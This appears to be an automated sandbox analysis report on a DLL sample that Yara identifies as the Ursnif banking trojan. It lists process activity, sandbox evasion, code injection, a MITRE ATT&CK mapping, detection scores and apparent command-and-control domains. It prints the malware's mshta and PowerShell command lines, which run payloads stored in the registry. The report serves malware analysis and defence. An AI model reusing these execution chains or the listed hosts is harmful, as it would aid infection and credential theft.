Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3072
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6049

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 59 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 40 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B94FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Source: mshta.exe, 0000001C.00000003.397674944.0000022FB9EA0000.00000004.00000001.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B75BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B916A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.0.cs

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: unknown EIP: AE131580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: target process: 3292

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6D37B12E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6D37B12E0

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B804D7 cpuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B8B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00401000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B87AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0040166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection512	Rootkit4	NTDS	System Information Discovery45	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion4	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion4	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sup11_dump.dll	46%	Virustotal		Browse
sup11_dump.dll	100%	Avira	TR/Crypt.ZPACK.Gen
sup11_dump.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE	0%	Avira URL Cloud	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
